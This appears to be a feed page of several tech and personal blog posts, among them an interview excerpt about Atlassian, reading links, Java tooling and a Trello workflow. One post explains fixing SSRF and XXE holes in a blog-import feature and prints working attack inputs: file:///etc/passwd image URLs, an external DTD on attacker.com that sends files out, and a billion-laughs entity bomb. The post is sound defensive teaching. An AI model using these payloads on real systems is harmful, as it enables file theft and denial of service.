there’s a lot more we can do in that era as software changes. Secondly, obviously AI has come along, and we now have chats and applications as a extra part of the browser experience, so I think we can change how enterprises use browsers, security being a big issue. I think AI in the browser is a really important thing, but I suspect it’s not in the basic way of just combining Chrome and ChatGPT, that’s not how it’s going to play out. I suspect it requires a massive amount of design, which The Browser Company is phenomenal at, and it requires changing how people use their day-to-day applications. From our point of view, and I’ve been an Arc fan since day one, [The Browser Company CEO] Josh [Miller] and I have known each other a long time, there’s a knowledge worker angle and there’s obviously a business angle to it in a huge way that our customers are knowledge workers. We can change the way they do their work in a meaningful way of productivity, that is exactly what we have been trying to do in a lot of different ways. The browser itself, being chromium-based, Edge being chromium-based, Chrome being chromium-based, the rendering of webpages is not the problem, it is the fundamental user experience of, “How do I take all of my SaaS applications, my agents, my chats, my tabs, my knowledge, and put it all together in ways that make my day quicker?” — that is what we are trying to do fundamentally at the start. The context that we have is incredibly important for that. And the browser has, if you think about it, my personal memory. We used to call it the browser history. Great, it shows what I’ve seen, it does not have my organizational memory, which we have a great example of in the Teamwork Graph. So if I can put these things together, I can make a much more productive browsing experience for customers fundamentally in that world. I think we have an amazing shot of doing that and of changing how knowledge workers use SaaS. We’re not trying to make a browser, as I’ve said, for my kids, we’re not trying to make a browser for my parents, we’re not trying to make a browser for shopping or for anything else. We’re trying to make a browser for people who spend all day living in Salesforce and Jira and Google Docs and Confluence and Figma and GitHub, and that is their life. The laptop warrior that sits in that experience, I believe we can use AI and design to make that a far better experience and build an amazing product. They’re well on the way to doing that, we can supercharge doing it. You look skeptical. No, I’m looking at the clock, I skipped over a huge section. Your whole shift to the cloud, all those sorts of things. However, there is one thing I wanted to get to: you are wearing an Atlassian Williams Racing hat , I am a big F1 fan, I was very excited about you doing this . How did that come about? How was the first year? Was this another hunch this is going to work out? I mean, Williams is looking like a pretty good bet. MCB: Yes, our world’s largest sports bet. Look, how did it come about? So how do I make a short answer? F1 is changing, I think, in a massive way. I know now being incredibly deep in the business of it, the fundamental change is that hardware is becoming less important and software is becoming more important, this is a trend that we are used to. JV, James Vowles , the Team Principal, was the first person that approached us a long while ago now to help them, and for a teeny, teeny sticker in the corner, to help them get more productive as a team. What people don’t realize about F1 is these are large organizations, right? There’s 1100 people that work for Atlassian Williams Racing. And Williams was really pared down and skinny, he was brought back in with new owners to actually rebuild the entire thing? MCB: Yes, they were in deep trouble. But in rebuilding it, he is a software engineer, software developer by trade, by history kind of thing. He’s a technically-minded person. He downloaded Jira himself in 2004 to install it, so he knows us quite well. So we were brought on for our ability to help them with their teamwork and their collaboration, they really needed a technical upgrade to a whole lot of their systems. Turns out they need us in almost every part of their business because the service workflow’s important. We’re now in the garage, we’re using tons of AI to try to make them better, so there’s a lot of things we can do to build to hopefully help them win, and it’s a mission you can fall in love with. Here is one of the most storied brands in Formula 1 that’s fallen on tough times, every sportsperson loves a recovery story. And I was sold early on the recovery story, I’m like, “Fuck it, let’s go help, let’s make this happen. Let’s get back to being a championship team”. So we fell in love with the mission, and JV is super compelling, he’s got a one-decade goal, and they’re very goal-driven, and we love that, but they needed a lot of help, so that’s what they asked us for help with is initially. The more we looked at it, the more we learned about Formula 1, yes, it’s becoming a software-driven sport. So as an example, Atlassian Williams, I believe have twice as many software developers as the next team on the grid. Because it’s cost-capped, you got to choose, “Do I hire a software developer or an aerodynamicist?” — it’s a very clear cost cap, you’re choosing where to put your resources. As virtualization and everything get better, it’s less, “How well can I draw a curve?” and, “How much can I help 1100 people work together, and how can we build great software”, which really is the core of the car, right? So that then comes to us, tiny sticker, probably a founder-ish moment where I’m like, “How much is the sticker on the top?”, and they didn’t have a sticker on the top and I’m like, well, “What would that get us?” So we ran the numbers on that and the reason is twofold. You talked about our GTM, our go-to-market transformation, we have an ability to build various things. Firstly, branding is obviously massive, top three teams get 10 times the branding as the bottom three teams. So if you’re going to make a sports bet, you pay for a long period of time with the bottom three team, you help make them a top three team, and your sport bet pays out really well just on a sheer TV time and etc — the number of staff, parents, and other things, have said to staff members, “Hey, that company you work for, it’s really great, I saw them on the TV on the weekend”, and the staff member will say, “Dude, I’ve worked there for 12 years, why do you suddenly know about it?”, “Oh, I saw them driving. Carlos [Sainz Jr.] is great”, or something. And he is! So obviously, there’s a huge marketing and branding angle that’s about their position being better. The really interesting part of what we’re doing there is we have customers all around the world, we have customers in 200-odd countries, and we can’t go and visit all of our biggest customers in a meaningful way. We certainly can’t take them to some of our best and most exciting customers, right? There are electric car companies that use our stuff that we’d love to take many customers to a factory, or rockets, or whoever, I can’t take many customers into some of your favorite chip companies and say, “Look how they use our stuff”, I can maybe get one or two customers a year into that customer and show them how they use our things. With Formula 1, what we’re building is a mobile EBC, so an executive briefing center. Formula 1 goes around the world. It goes to Melbourne, it goes to Singapore, it goes to Japan, it goes to England, it goes to various parts of Northern Europe, it goes to various parts of America and you’re like, “Hey, where are our customers?” — roughly distributed like that. It comes to town, we can invite a whole lot of customers into a great experience, we can tell them a lot about Atlassian software, we can also invite them into one of our best customers. They can sit in the garage, and I can tell them how our service collection is helping power the assets, that when that wing’s broken, it gets known here, and they start making a new one back in the factory in Oxford, and this one gets shipped around the world and another one will get moved. And, “Here, I can show you the asset management and the service that goes along with it, I can show you how the garage is getting more efficient because of us, I can show you how we’re helping them win races”. We don’t drive cars, we help them be more productive as a team and I can do that in an environment of it’s an exciting environment. They can drink a great latte or a champagne or whatever they want, and I can explain to them how we are transforming this business in a meaningful way with our tools no matter which way they want to look at it, which is the most powerful customer story that you can go and tell a couple-hundred customers a year in their city. We come to their city, right? I was in Montreal, I took a whole bunch of Canadian customers over the three days, they were like, “This changes my view of Atlassian”, and I’m like, “That’s exactly our goal”, that is at the enterprise end of enterprise sales though, right? But that’s the ironic thing, it’s as far away from where you started as you could be. MCB: Well, they didn’t get there. I met two Canadian banks we had in Montreal as an example, both of whom had been customers for over 20 years, they started spending $800 bucks or maybe $4800 as we moved our pricing to around five grand — now they spend a million, two million dollars a year, and they could be spending ten. We have the ability to give the massive business value across a far larger swath of their business. And I can say, “What do you use from our system of work today? What could you use? Let me show you how Williams uses that piece of the system of work”, which is just a very visceral and exciting customer example to show them how they’re winning. And it helps, again, culturally, super aligned. They’re an awesome group of people trying really hard to win in the most ridiculously competitive sport and the highs are highs, the lows are low. Any sporting fan, you’re well familiar with various different sports that we have in common, but this is technology built by a large business team that has to win a sport. That doesn’t happen anywhere else in the sporting world, I would claim. Giannis [Antetokounmpo] doesn’t make his own shoes and have a team of people making better shoes and a better basketball so he can win, that doesn’t happen in other sports. It’s all about the people on the floor in an NBA game as to who wins, and that’s great, don’t get me wrong, I love basketball. The work in Formula 1 is done by 1000 people back in Oxford. It’s a Constructor Championship . MCB: The constructor championship I do think should be more important, especially given the current exact week we’re in, which is an amazing week for Atlassian Williams Racing, second podium . You talk about that bet, I told JV at the start of the year, I thought that he’s like, “What do you think our five-year future is?”, and I said, “Look, I think, number one, we’ll get one podium this year, 2025; 2026, we’ll win a race; and by 2030, we will have won a championship, that is my OKRs [Objectives and Key Results]”, and he said, “Oh, wow, okay, yeah I think so”. It lines up, I know the team OKRs and other things. And we won two podiums this year, so I was wrong, and I think we have a great chance for 2026, and we are working hard to make the team better and the single-best customer example we have of every piece of software that we sell. Mike, I’d love to talk again. It was great talking to you again. And, hey, good luck. And I’m a Williams fan, so I’ll be cheering for you this weekend. MCB: Oh, yeah. Well, I’m not sure this weekend, but 2026, 2027- Okay. I’m kind of kissing up, I am dying for Max [Verstappen] to win is the honest truth. I need the McLarens to run into each other . But other than that, Williams is my second love. MCB: Do you think McLaren will issue team orders to switch them if Oscar is in second and Lando’s in fourth? Yes. And I don’t know what’s going to happen if that happens, and this will be fascinating. MCB: We will have to see. It’s going to be a huge week. But that’s what makes the sport exciting, right? The whole thing is amazing. Talk to you later. MCB: All right. Thanks, man. This Daily Update Interview is also available as a podcast. To receive it in your podcast player, visit Stratechery . The Daily Update is intended for a single recipient, but occasional forwarding is totally fine! If you would like to order multiple subscriptions for your team with a group discount (minimum 5), please contact me directly. Thanks for being a supporter, and have a great day!

0 views
Brain Baking 1 months ago

Favourites of November 2025

The more holiday seasons I see coming and going, the less enthused I am by the forced celebration that tastes an awful lot like capitalism. I put up my gift guide anyway, just in case anyone is willing to buy me that dough mixer, otherwise I’ll have to do it in January as an early expense for the upcoming year. Thanks in advance! There isn’t a lot of mental space left to prepare for celebrations anyway, with the second kid giving us an equally hard time as the first. Anyway. Welcome, last month of the year, I guess. The first one who plays Last Christmas is out . Previous month: September 2025 . Not really. None, to be very precise. But I did buy yet another one: Mara van der Lugt’s Hopeful Pessimism , which sounded like it was written for me. I expect equally great and miserable things from this work. I’ve only had the time to write the review for Rise of the Triad: Ludicrous Edition (ROTT) that I ended up buying for the Nintendo Switch thanks to Limited Run Games’ stock overflow. It felt wonderfully weird to be playing a 1994 DOS cult classic on the Switch. And yes, the Ludicrous Edition is ludicrous . I finally made it past the third map! I’m still feeling the retro shooter vibe and bought the Turok Trilogy on a whim after learning it was also done by Nightdive Studios. Another smaller game I played in-between the ROTT sessions was Shotgun King that somehow manages to combine chess with shotguns, and very successfully so. Unfortunately, it’s a bit of a bare bones roguelike, difficult as hell, and therefore not really my forte. I have yet to unlock all the shotguns. Don’t buy the game on MacOS: GOG ended up refunding my purchase because it kept on crashing in the introduction cutscene. The Switch edition is fine. Slightly game related: my wife sent me this YouTube video where Ghostfeeder explains how he uses the Game Boy to make music that I think is worth sharing here: Related topics: / metapost / By Wouter Groeneveld on 3 December 2025.  Reply via email . Charlie Theel put up a post called Philosophy and Board Games on Player Elimination where I learned about Mara’s Hopeful Pessimism . On a slightly more morbid topic, Wesley thought about How Websites Die and shared his notes. Lina’s map of the internet functions as a beautiful pixelated website map that inspires me to do something similar. Kelson Vibber reviews web browsers . The sad state of Mozilla made me look elsewhere, and I’m currently using both Firefox and Vivaldi. According to Hypercombogamer the Game Boy Advance is Nintendo’s Most Underrated Handheld . I don’t know if I agree, but I do agree that both the GBA and its huge library are awesome. Eurogamer regularly criticises Microsoft and their dumb Xbox moves. The last piece was the ridiculous Game Pass advent . Matt Bee’s retro gaming site is loaded with cool looking game badges that act as links to small opinion pieces. It’s a fun guessing game as I’m not familiar with some of the pixel art. Astrid Poot writes about lessons learned about making and happiness . Making is the route to creativity. Making is balance. Alyssa Rosenzweig proves that AAA gaming on Asahi Linux is totally possible. Patrick Dubroy has thoughts on ways to do applied research . His conclusion? Aim for practical utility first, by “building something that addresses an actual need that you have”. Eat your own dog shit, publish later? Here’s another way to block LLM crawlers without JavaScript by Uggla. Wolfgang Ziegler programs on the Game Boy using Turbo Rascal , something I hadn’t encountered before. Wes Fenlon wrote a lengthy document over at PC Gamer on how to design a metroidvania map . Jan Ouwens claims there are no good Java code formatters out there. Seb shared A Road to Common Lisp after I spotted his cool “warning: made with Lisp” badge. A lot of ideas are taking form, to be continued… Speaking of Lisp: Colin Woodbury is drawn to Lisp because of its simplicity and beauty. Robert Lützner wrote an honest report on the duality of being a parent . As a parent myself, I found myself sobbing and nodding in agreement as I read the piece. Michael Klamerus shares his thoughts on Crystal Caves HD . The added chiptune music just feels misplaced in my opinion. I’m looking forward to the Bio Menace remaster as well! Felienne Hermans criticizes the AI Delta Plan (in Dutch). We should stop proclaiming build, build, build! as the slogan of the future and start thinking about reduce & re-use. Hamilton shares his 2025 programming language tier list . The funny thing is that number one on the list suddenly got replaced by a more conventional alternative. I don’t agree with his reasoning at all (spoiler: it contains AI), but it’s an interesting read nonetheless. Mikko Saari published his 2025 edition of the top 100 board game list a little earlier this year. There are a bunch of interesting changes in the top 10! SETI also pops up quite high on my list, but I haven’t had the chance to create it yet. If you live near The Netherlands, consider visiting The Home Computer Museum . They also have a ton of retro magazines lying around to flip through! Wait, there’s a Heroes of Might & Magic card game? That box looks huge! (So does the backing price…) Death Code is an entirely self-hosted web application that utilizes Shamir’s Secret Sharing to share secrets after you die. tttool is a reverse-engineering effort to inspect how the Tip Toi educational pens work. I was somehow featured at https://twostopbits.com/ and now I know why: it’s Hacker News for retro nerds. Apparently things like WhatsApp bridges for Matrix exist, which got me thinking: can I run bridges for WhatsApp and Signal to merge all messaging into The One Ring ? Emulate Windows 95 right in the browser . Crazy to see what you can do nowadays with WASM/JS/Whatever. It looks like LDtk is the best 2D game map editor ever created. Wild Weasel created a retro looking Golf video game shrine in their little corner of the internet, and the result is lovely. I should really start playing my GBC Mario Golf cart.

10 views
blog.philz.dev 1 months ago

Coverage

Sometimes, the question arises: which tests trigger this code here? Maybe I've found a block of code that doesn't look like it can't be hit, but it's hard to prove. Or I want to answer the age-old question of which subset of quick tests might be useful to run if the full test suite is kinda slow. So, run each test with coverage by itself. Then, instead of merging all the coverage data, find which tests cover the line in question. Oddly enough, though some of the Java tools (e.g., Clover) support per-test coverage, the tools here in general are somewhat lacking. , part of the suite, supports a ("test name") marker, but only displays the per test data on a per-file level: This is the kind of thing where in 2025, you can ask a coding agent to vibe-code or vibe-modify a generator, and it'll work fine. I have not found the equivalent of Profilerpedia for coverage file formats, but the lowest common denominator seems to be . The file format is described at geninfo(1) . Most language ecosystems can either produce LCOV output directly or have pre-existing conversion tools.

0 views
Brain Baking 1 months ago

Using Energy Prediction To Better Plan Cron Jobs

Since the Belgian government mandated the use of digitized smart energy meters we’ve been more carefully monitoring our daily energy demand. Before, we’d simply chuck all the dishes in the machine and program it to run at night: no more noise when we’re around. But now, consuming energy at night is costing us much more. The trick is to take as little as possible from the grid, but also put as little as possible back. In short, consume (or store) energy when our solar panels produce it. That dishwasher will have to run at noon instead. The same principle applies to running demanding software: CPU or GPU-intensive tasks consume an awful amount of energy, so why run them when there’s less energy available locally, thus paying more? Traditionally, these kinds of background jobs are always scheduled at night using a simple cron expression like that says “At 03:00 AM, kick things in gear”. But we can do better. At 03:00 AM, our solar panels are asleep too. Why not run the job when the sun is shining? Probably because you don’t want to interfere with the heavy load of your software system during the day thanks to your end users. It’s usually not a good idea to start generating PDF files en masse , clogging up all available threads, severely slowing down the handling of incoming HTTP requests. But there’s still a big margin to improve the planning of the job: instead of saying “At 03:00 AM exactly ”, why can’t we say “Between 01:00 AM and 07:00 AM”? That’s still before the big HTTP rush, and in the early morning, chances are there’s more cheap energy available to you. Cooking up a simple version of this for home use is easy with the help of Home Assistant. The following historical graph shows our typical energy demand during the last week (dreadful Belgian weather included): Home Assistant history of P1 Energy Meter Demand from 24 Nov to 28 Nov. Care to guess what these spikes represent? Evenings. Turning on the stove, the oven, the lights, the TV obviously creates a big spike in energy consumption, and at the same time, the moon replacing the sun results in us taking instead of giving from the energy grid. This is the reason the government charges more then: if everybody creates spikes at the same time, there’s much more pressure on the general grid. But I can’t bake my fries at noon when I’m work and we aren’t supposed to watch TV when we’re working from home… That data is available through the Home Assistant API: . Use an authorization header with a Bearer token created in your Home Assistant profile. If you collect this for a few weeks and average the results you can make an estimated guess when demand will be going up or down. If you want things to get a bit more fancy, you can use the EMHASS Home Assistant plug-in that includes a power production forecast module. This thing uses machine learning and other APIs such as https://solcast.com/ that predicts solar power—or weather in general: the better the weather, the more power available to burn through (given you’ve got solar panels installed). EMHASS also internalizes your power consumption habits. Combined, its prediction model can help to better plan your jobs when energy demand is low and availability is high. You don’t need Home Assistant to do this, but the software does help smooth things over with centralized access to data using a streamlined API. Our energy consumption and generation is measured using HomeWizard’s P1 Meter that plugs into our provider’s digital meter and sends the data over to Home Assistant. That’s cool if you are running software in your own basement, but will hardly do on a bigger scale. Instead of monitoring your own energy usage, you can rely on grid data from the providers. In Europe, the European Network of Transmission System Operators for Electricity (ENTSO-E) provides APIs to access power statistics based on your region—including a day-ahead forecast! In USA, there’s the U.S. Energy Information Administration (EIA) providing the equivalent, also including a forecast, depending on the state. ENTSO-E returns a day-ahead pricing model while EIA returns consumption in megawatthours, but both statistics can be used for the same thing: to better plan that cron job. And that’s exactly what we at JobRunr managed to do. JobRunr is an open-source Java library for easy asynchronous background job scheduling that I’ve had the pleasure to work on the last year. Using JobRunr, planning a job with a cron expression is trivial: But we don’t want that thing to trigger at 3 AM, remember? Instead, we want it to trigger between an interval, when the energy prices are at their lowest, meaning when the CPU-intensive job will produce the least amount of CO2 . In JobRunr v8, we introduced the concept of Carbon Aware Job Processing that uses energy prediction of the aforementioned APIs to better plan your cron jobs. The configuration for this is ridiculously easy: (1) tell JobRunr which region you’re in, (2) adjust that cron. Done. Instead of , use : this means “plan at somewhere between an hour before 3 AM to four hours later than 3 AM, when the lowest amount of CO2 will be generated”. That string is not a valid cron expression but a custom extension on it we invented to minimize configuration. Behind the scene, JobRunr will look up the energy forecasts for your region and plan the job according to your specified time range. There are other ways to plan jobs (e.g. fire-and-forget, providing s instaed of a cron, …), but you get the gist. JobRunr’s dashboard can be consulted to inspect when the job is due for processing. Since the scheduled picks can sometimes be confusing—why did it plan this at 6 AM and not at 7?—the dashboard also visualizes the predictions. In the following screenshot, you can see being planned at 15:00 PM, with an initial interval between 09:39 and 17:39 (GMT+2): The JobRunr dashboard: a pending job, to be processed on Mon Jul 07 2025 at 15:00 PM. There’s also a practical guide that helps you get started if you’re interested in fooling around with the system. The idea here is simple: postpone firing up that CPU to the moments with more sunshine, when energy is more readily available, and when less CO2 will be generated 1 . If you’re living in Europe/Belgium, you’re probably already trying to optimize the energy consumption in your household the exact same way because of the digital meters. Why not applying this principle on a grander scale? Amazon offers EC2 Spot Instances to “optimize compute usage” which is also marketed as more sustainable, but this is not the same thing. Shifting your cloud workout to a Spot Instance will use “spare energy” that was already being generated. JobRunr, and hopefully soon other software that optimized jobs based on energy availability, plans using marginal changes. In theory, the decision can determine the fuel resource as high spikes force high-emission plants to burn more fuel. In always-on infrastructure, spare compute capacity is sold as the Spot product—there’s no marginal change. The environmental impact of planning your job to align with low grid carbon intensity is much higher—in a good way—compared to shifting cloud instance types from on-demand/reserved to Spot. Still, it’s better than nothing, I guess. If the recent outages of these big cloud providers have taught us anything, it’s that on-premise self-hosting is not dead yet. If you happen to be rocking Java, give JobRunr a try. And if you’re not, we challenge you to implement something similar and make the world a better place! You probably already noticed that in this article I’ve interchanged carbon intensity with energy availability. It’s a lot more complicated than that, but for the purpose of Carbon Aware Job Processing, we assume a strong relationship between the electricity price and CO2 emissions.  ↩︎ Related topics: / java / By Wouter Groeneveld on 28 November 2025.  Reply via email . You probably already noticed that in this article I’ve interchanged carbon intensity with energy availability. It’s a lot more complicated than that, but for the purpose of Carbon Aware Job Processing, we assume a strong relationship between the electricity price and CO2 emissions.  ↩︎

0 views
Hugo 1 months ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message: > Huge vuln on writizzy > > Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd Basically, you absolutely need to validate the images from the Medium HTML! > > Your /etc/passwd as proof: > > Micka Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities. ## The SSRF Vulnerability SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page: ```html ``` I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this: ```markdown ![](https://cdn.bunny.net/blog/12132132/image.jpg) ``` So to do this, at some point I open a URL to the image: ```kotlin val imageBytes = try { val connection = URL(imageUrl).openConnection() connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 connection.getInputStream().use { it.readBytes() } } catch (e: Exception) { logger.warn("Failed to download image $imageUrl: ${e.message}") return imageUrl } ``` Then I upload the byte array to Bunny. Okay. But what happens if the user writes this: ```html ``` The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.: ```html ``` The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used: ```kotlin if (url.protocol !in listOf("http", "https")) { logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl") return imageUrl } ``` Then, verify that we're not attacking private URLs: ```kotlin val host = url.host.lowercase() if (isPrivateOrLocalhost(host)) { logger.warn("Blocked private/localhost URL: $imageUrl") return imageUrl } ... private fun isPrivateOrLocalhost(host: String): Boolean { if (host in listOf("localhost", "127.0.0.1", "::1")) return true val address = try { java.net.InetAddress.getByName(host) } catch (_: Exception) { return true // When in doubt, block it } return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress } ``` But here, I still have a risk. The user can write: ```html ``` And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests: ```kotlin val connection = url.openConnection() if (connection is java.net.HttpURLConnection) { connection.instanceFollowRedirects = false } connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode if (responseCode in listOf(301, 302, 303, 307, 308)) { logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)") return imageUrl } ``` Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka: > You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :) ## The XXE Vulnerability XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to: - Read local files (/etc/passwd, config files, SSH keys...) - Perform SSRF (requests to internal services) - Perform DoS (billion laughs attack) Micka modified the WordPress XML file to add an entity declaration: ```xml ]> ... &xxe; ``` This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly: ```xml %dtd; ]> ``` And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd): ```xml "> %all; ``` Finally, to crash a server, the attacker could also have done this: ```xml ]> &lol9; 1 publish post ``` This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea. We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities: ```kotlin val factory = DocumentBuilderFactory.newInstance() // Disable external entities (XXE protection) factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) factory.setFeature("http://xml.org/sax/features/external-general-entities", false) factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false) factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false) factory.isXIncludeAware = false factory.isExpandEntityReferences = false ``` I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.

0 views
Brain Baking 1 months ago

Rendering Your Java Code Less Error Prone

Error Prone is Yet Another Programming Cog invented by Google to improve their Java build system. I’ve used the multi-language PMD static code analyser before (don’t shoot the messenger!), but Error Prone takes it a step further: it hooks itself into your build system, converting programming errors as compile-time errors. Great, right, detecting errors earlier, without having to kick an external process like PMD into gear? Until you’re forced to deal with hundreds of errors after enabling it: sure. Expect a world of hurt when your intention is to switch to Error Prone just to improve code linting, especially for big existing code bases. Luckily, there’s a way to gradually tighten the screw: first let it generate a bunch of warnings and only when you’ve tackled most of them, turn on Error! Halt! mode. When using Gradle with multiple subprojects, things get a bit more convoluted. This mainly serves as a recollection of things that finally worked—feeling of relief included. The root file: The first time you enable it, you’ll notice a lot of nonsensical errors popping up: that’s what that is for. We currently have the following errors disabled: Error Prone’s powerful extendability resulted in Uber picking up where Google left off by releasing NullAway , a plug-in that does annotation-based null checking fully supporting the JSpecify standard . That is, it checks for stupid stuff like: JSpecify is a good attempt at unifying these annotations—last time I checked, IntelliJ suggested auto-importing them from five different packages—but the biggest problem is that you’ll have to dutifully annotate where needed yourself. There are OpenRewrite JSpecify recipes available to automatically add them but that won’t even cover 20% of the cases, as when it comes to manual if null checks and the use of , NullAway is just too stupid to understand what your intentions are. NullAway assumes non-null by default. This is important, because in Java object terminology, everything is nullable by default. You won’t need to add a lot of annotations, but adding has a significant ripple effect: if that’s nullable, then the object calling this object might also be, which means I should add this annotation here and here and here and here and here and… Uh oh. After 100 compile errors, Gradle gives up. I fixed 100 errors, recompiled, and 100 more appeared. This fun exercise lasted almost an entire day until I was the one giving up. The potential commit touched hundreds of files and added more bloat to an already bloated (it’s Java, remember) code base I’ve ever seen. Needless to say, we’re currently evaluating our options here. I’ve also had quite a bit of trouble picking the right combination of plug-ins for Gradle to get this thing working. In case you’d like to give it a go, extend the above configuration with: You have to point NullAway to the base package path ( ) otherwise it can’t do its thing. Note the configuration: we had a lot of POJOs with private constructors that set fields to while they actually cannot be null because of serialisation frameworks like Jackson/Gson. Annotate these with and NullAway will ignore them. If you thought fixing all Error Prone errors was painful, wait until you enable NullAway. Every single statement needs its annotation. OpenRewrite can help, but up to a point, as for more complicated assignments you’ll need to decide for yourself what to do. Not that the exercise didn’t bear any fruit. I’ve spotted more than a few potential mistakes we made in our code base this way, and it’s fun to try and minimize nullability. The best option of course is to rewrite the whole thing in Kotlin and forget about the suffix. All puns aside, I can see how Error Prone and its plug-ins can help catch bugs earlier, but it’s going to come at a cost: that of added annotation bloat. You probably don’t want to globally disable too many errors so is also going to pop up much more often. A difficult team decision to make indeed. Related topics: / java / By Wouter Groeneveld on 25 November 2025.  Reply via email . —that’s a Google-specific one? I don’t even agree with this thing being here… —we’d rather have on every line next to each other —we can’t update to JDK9 just yet —we’re never going to run into this issue —good luck with fixing that if you heavily rely on reflection

4 views
Dan Moore! 1 months ago

Thankful For Memory Managed Languages

I’m thankful my software career started when memory managed languages were first available and then dominant. Or at least dominant in the areas of software that I work in–web application development. I learned BASIC, WordPerfect macros, and Logo before I went off to college. But my first real programming experience was with Pascal in a class taught by Mr. Underwood (who passed away in 2021 ). I learned for loops, print debugging and how to compile programs. Pascal supports pointers but I don’t recall doing any pointer manipulations–it was a 101 class after all. I took one more CS class where we were taught C++ but I dropped it. But my real software education came in the WCTS ; I was a student computer lab proctor. Between that and some summer internships, I learned Perl, web development and how to deal with cranky customers (aka students) when the printer didn’t work. I also learned how to install Linux (Slackware, off of something like 16 3.5-inch disks) on a used computer with a 40MB hard drive, how to buy hardware off eBay, and not to run in a C program. That last one: not good. I was also able to learn enough Java through a summer internship that I did an honors thesis in my senior year of college. I used Java RMI to build a parallelizable computation system. It did a heck of a job of calculating cosines. My first job out of school was slinging perl, then Java, for web applications at a consultancy in Boulder. I learned a ton there, including how to grind (one week I billed 96 hours), why you shouldn’t use stored procedures for a web app, how to decompile a Java application with jad to work around a bug, and how to work on a team. One throughline for all that was getting the work done as fast as possible. That meant using languages and frameworks that optimized for developer productivity rather than pure performance. Which meant using memory managed languages. Which are, as Joel Spolsky wrote , similar to an automatic transmission in terms of letting you just go. I have only the faintest glimmer of the pain of writing software using a language that requires memory management. Sure, it pops up from time to time, usually when I am trying to figure out a compile error when building an Apache module or Ruby gem. I google for an incantation, blindly set environment variables or modify the makefile, and hope it compiles. But I don’t have to truly understand malloc or free. I’m so thankful that I learned to program when I didn’t have to focus on the complexities of memory management. It’s hard enough to manage the data model, understand language idiosyncrasies, make sure you account for edge cases, understand the domain and the requirements, and deliver a maintainable solution without having to worry about core dumps and buffer overflows.

0 views
A Room of My Own 1 months ago

My One-Board Trello Task Management System

So I just came out of a project management webinar — and they shared this really simple task-management method. And I realized that I’ve basically been doing this all along. It’s about moving away from constantly trying to prioritise everything to simply postponing things in a deliberate, thought-out way. And it felt nice to see that this thing I pieced together is,  a “real” method. After years of trying to figure out how to manage all my different tasks, I came up with a system a few years ago that has just worked. I haven’t had to change it in ages. I’ve tried different apps, different methods, different everything — but this setup (which I run in Trello, though you could do it anywhere that has Kanban boards) has stuck. Why Trello? Mostly because it’s free, simple, and the phone app works. It sends reminders to my email (which I’ll see because I keep inbox zero) and as phone pop-ups. The email part is key for me — if it hits my inbox, it won’t get lost. Over time this system grew with me, but this is where I’ve landed: one single board . Just one. Below is the breakdown of my lists on this one board (though I do add more when I need to — if I have extra tasks or a project, like planning a trip, spring cleaning, I’ll add a temporary list for it). When a task or a list is done, I delete it. I don’t archive it, I don’t capture it anywhere else. Done and gone. You can email directly into Trello — I rarely do, but I like knowing I could. This list is where I stick generic things: kids’ school holidays, public and work statutory holidays, my goals for the year, and my very loose 5-year “plan” (which is more vibes than plan, honestly). Because I like the Eisenhower Matrix method (I wrote about it here) , I have a few lists that follow that idea: Urgent + important. - Things that actually need to happen pretty soon or right away. That elusive middle ground where all the good long-term things live. I’m honestly terrible at this list lately because work has been so full-on — which is also why my personal projects, like blogging, have been basically nonexistent. But this is where those long-term goals go: things like education, personal skill development, improving health and wellness — all the stuff that matters but always falls behind the “do immediately” tasks, and therefore need to be scheduled. Anything already booked, or anything that repeats: insurance payments, car registration, health appointments, whatever. I put a date on it, set a reminder, and forget about it until it surfaces again. I do this for the whole family. Why not just put it all in my shared (with my husband and son) Google Calendar? Because some things don’t need to be done on the day they pop up. For example: car registration. I set a reminder a month before it’s due. I won’t do it that exact day, but it will pop up, I’ll drag it to “Do Immediately,” and then it gets done. If something goes in Google Calendar, it’s because it happens at an actual fixed time — dinner with a friend, a scheduled doctor’s appointment, whatever. Those don’t go in 